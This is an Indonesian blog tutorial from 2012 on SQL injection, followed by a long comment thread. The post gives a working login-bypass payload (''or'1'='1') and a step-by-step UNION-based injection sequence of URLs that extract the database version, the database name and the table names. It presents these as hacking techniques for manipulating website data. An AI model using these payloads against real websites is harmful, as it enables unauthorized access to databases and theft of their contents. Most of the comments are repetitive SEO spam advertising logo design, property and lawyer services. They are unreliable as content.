24 Mei 2012

SQL Injection


SQL INJECTION

Sql Injection adalah kegiatan hacking dengan menyerang website melalui browser dengan memasukkan sintax-sintax Sql untuk memperoleh informasi tertentu dengan membaca pesan error yang keluar.


 Setiap website memiliki admin, user yang terdaftar melalui adminlah yang dapat masuk ke dalam website melalui login. Disini ada kelemahan yaitu user dapat masuk kedalam system dengan memasukkan command SQL injection,disini kami memasukkan command pada username “ ’or’1’=‘1 ” dan passowordnya “’or’1’=‘1”  ,command diatas mempunyai arti tertentu,yaitu sebagai berikut :

Tanda single quote ‘ memiliki arti bahwa user dapat menginputkan command didalam command,atau user dapat memanipulasi database dengan menyisipkan tanda single quote.Kemudian untuk or’1’=’1 berarti lemparan hasil yang akan dimasukkan adalah true,karena semua variable yang di OR kan dengan true,dalam hal ini 1=1 akan bernilai true,sehingga data yyang akan dilempar kedalam database adalah nilai true,dan begitu pula dengan password yang dilempar dengan kembalian true,sehingga database akan meloloskan inputan user tersebut.Dan User dapat masuk kedalam database sebagai admin, hal tersebut dapat kita buktikan saat kita masuk kedalam query analyzer milik SQL server 2000,karena sintax pada SQL server 2000 dengan Mikrosoft acces hampir sama berikut tampilnnya :



apabila dapat masuk kedalam page admin maka, dapat leluasa memanipulasi data yang ada pada website tersebut

            SQL Injection juga dapat dilakukan melalui URL pada browser. Dari url ditambahkan tanda single quote () untuk melihat apakah ada eror yang muncul dengan penambahhan tanda single quote tersebut pada url,dan akan muncul tampilan seperti berikut :
             
              Dari tampilan diatas kita dapat melihat adanya pesan eror yang muncul dikarenakan ada karakter single quote yang dimasukkan pada url,sehingga ini akan memberi jalan pada hacker untuk mengeksploirtasi lebih jauh.kemudian setelah muncul eror kita lakukan step selanjutnya yaitu kita masukkan sintax seperti berikut
Kemudian kita urutkan angka order by 1 - -  ,order by 2- - ,order by 3  - - dan seterusnya sampai muncul eror


Disini muncul eror unknown column ‘5’ in order clause,ini berarti kolom yang tersedia pada database website tersebut berjumlah 4.
2. Selanjutnya kita lakukan step selanjutnya yaitu ketikkan (http://192.168.2.1/website/index.php?id=1+UNION+SELECT+1,2,3,4--) dari perintah tersebut, akan muncul sebuah angka (misalnya angka 2),
3.  kemudian dilanjutkan dengan perintah ( http://192.168.2.1/website/index.php?id=-1+UNION+SELECT+1,@@version,3,4--)  pada angka 2 tersebut kita ganti dengan @@version untuk melihat versi database yang digunakan karena hanya versi mysql 5 keatas yang dapat diinject.
6. kemudian selanjutnya kita eksploitasi lebih dalam tentang database tersebut dengan mencari nama database yang digunakan ketikkan (http://192.168.2.1/website/index.php?id=2+UNION+SELECT+1,concat(database()),3,4--) dan akan muncul tampilan seperti berikut


7. Dari tampilan diatas muncul nama database yang digunakan yaitu kamjardb,dari informasi ini kita dapat melihat tabel yang berada didalamnya dengan mengketikkan (http://192.168.2.1/website/index.php?id=-1+union+select+1,groupconcat(table_name),3,4+from +informationschema.tables+where+table_schema=database%28%29--).­­­­



Dengan informasi - informasi yang telah di dapat, maka tidak lah sulit bagi hacker untuk memanipulasi dat-data yang ada di dalam website tersebut.
TERIMA KASIH..
untuk full donwload tutorialnya gan
Klik disini

251 komentar:

«Terlama   ‹Lebih tua   201 – 251 dari 251
adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa pembuatan desain logo

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. bikin desain stiker online

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa desain ui & ux app

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa pembuat logo online shop murah

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. membuat desain kartu nama

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. buat kartu nama online

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. buat kartu nama bandung

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. buat kartu nama murah

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. buat kartu nama surabaya

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. bikin desain kartu nama

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. bikin kartu nama online

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. bikin kartu nama di bandung

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. bikin kartu nama sendiri

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. bikin kartu nama jakarta

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa pembuatan kartu nama

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa pembuatan kartu nama di bali

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa desain logo esport

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa pembuatan kartu nama jual

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa pembuatan kartu nama bandung

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa pembuatan kartu nama semarang

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa pembuatan kartu nama jakarta barat

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. tempat buat kartu nama

adam mengatakan...

https://buatlogoonline.com/tempat-desain-logo-online/

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. jasa desain logo

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. Jasa Pembuatan Logo Online Shop

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. Jasa Pembuat Logo

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. Jasa Desain Logo Murah

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. Jasa Logo Desain

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. Jasa Logo Esport

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. Jasa Logo Murah

adam mengatakan...

you have done a great job. I will definitely dig it and personally recommend to my friends. I am confident they will be benefited from this site. Jasa Membuat Logo

Sulameto.com mengatakan...

Biasanya pecinta burung ini membutuhkan audio suara burung lovebird mp3 untuk masteran, supaya burung lovebird miliknya juga bisa ngekek panjang. Kalau Anda butuh suara lovebird mp3. Kicauan burung lovebird memang dikenal merdu, sehingga burung ini sering diikutsertakan dalam perlombaan kicau. Burung lovebird yang menjadi pemenang biasanya yang memiliki kicau full isian dengan gaya petarung ganas dan lantang, namun tetap elegan.

divasoft mengatakan...

info yang menarik lengkap membahas networking, thanks udah sharing - jasa bikin website

sewa mobil di balikpapan mengatakan...

Sql Injection adalah kegiatan hacking dengan menyerang website melalui browser dengan memasukkan sintax-sintax Sql untuk memperoleh informasi tertentu dengan membaca pesan error yang keluar.

Agen Properti di Cianjur mengatakan...

hai apa kabar semuanya

Properti Di cianjur mengatakan...

coba dari sekarang, mari berkarya bersama

Agen Properti di Cianjur mengatakan...

Kerjaan yang mudah dan berprospek bagus

biaya jasa pembuatan website mengatakan...

Mencoba dan terus melakukan pekerjaan

jasa buat website toko online mengatakan...

Menarik sekali kontennya gan, semoga semuanya diberkahi, lancar dan sukses selalu

biaya jasa pembuatan website mengatakan...

Semoga manfaat bagi admin dan semua

biaya buat web mengatakan...

Ya saya suka dengan infonya

Rumah Murah Di Lembang bandung mengatakan...

Informasi yang sangat baik

Jual rumah bandung mengatakan...

Selamat malam , mantap infonya

Jual rumah bandung mengatakan...

Selamat malam , wah mantap infonya

Jual rumah bandung mengatakan...

makasih infonya

Jual rumah di majalengka Murah mengatakan...

Terima kasih buat infonya

tempat foto prewedding terbaik mengatakan...

Menurut saya artikel ini bagu.

contoh website dinamis mengatakan...

Selamat malam , untuk info nya sangat bermanfaat

pesan website mengatakan...

Selamat malam , makasih buat infonya

melanie rao mengatakan...

SQL Injection, a persistent cybersecurity threat, continues to be a prevalent and concerning vulnerability in database-driven applications. This malicious technique involves exploiting vulnerabilities in SQL queries to manipulate or gain unauthorized access to a database, potentially exposing sensitive information. As a result, it poses a significant risk to the confidentiality, integrity, and availability of data. The consequences of successful SQL Injection attacks can range from unauthorized data access to the complete compromise of an application's security. Mitigating this threat requires a multi-faceted approach, including robust input validation, the use of parameterized queries, and continuous monitoring for unusual database activities. Addressing SQL Injection is imperative in the ongoing battle to safeguard digital assets and protect against data breaches in an increasingly interconnected digital landscape.
estate planning lawyer near me
motorcycle accident

james anderson mengatakan...

Penjelasan yang detail tentang SQL Injection sangat bermanfaat. Menyoroti cara kerja dan kerentanan sistem adalah langkah penting untuk meningkatkan keamanan. Terima kasih atas pembagian informasi ini
Cheap Divorce Lawyers in New York

«Terlama ‹Lebih tua   201 – 251 dari 251   Lebih baru› Terbaru»